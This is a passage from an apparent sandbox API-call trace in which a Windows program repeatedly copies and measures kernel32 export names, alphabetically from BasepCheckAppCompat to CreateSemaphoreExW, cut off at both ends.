lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.731] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.731] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.731] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.731] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.731] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.731] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.731] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.731] lstrlenA (lpString="BEEP") returned 4 [0076.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.732] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.732] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.732] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.732] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.732] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.732] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.732] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.732] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.732] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.732] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.732] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.732] lstrlenA (lpString="CANCELIO") returned 8 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.732] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.732] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.732] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.732] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.732] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.732] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.733] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.733] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.733] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.734] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.734] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.734] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.734] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.734] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.734] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.734] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.734] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.734] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.734] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.735] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.735] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.735] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.735] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.735] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.735] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.735] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.735] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.735] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.735] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.735] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.735] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.735] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.735] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.735] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.735] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.735] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.735] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.735] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.736] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.736] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.736] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.736] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.736] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.736] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.736] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.736] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.736] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.736] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.736] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.736] lstrlenA (lpString="COPYFILEA") returned 9 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.736] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.736] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.736] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.736] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.736] lstrlenA (lpString="COPYFILEW") returned 9 [0076.736] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.737] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.737] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.737] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.737] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.737] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.737] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.737] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.737] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.737] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.737] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.737] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.737] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.737] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.737] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.737] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.737] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.737] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.737] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.737] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.738] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.738] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.738] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.738] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.738] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.738] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.738] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.738] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.738] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.738] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.738] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.738] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.738] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.738] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.738] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.738] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.738] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.738] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.739] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.739] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.739] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.739] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.739] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.739] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.739] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.739] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.739] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.739] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.739] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.739] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.739] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.739] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.739] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.739] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.739] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.739] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.740] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.740] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.740] lstrcpyA (in: 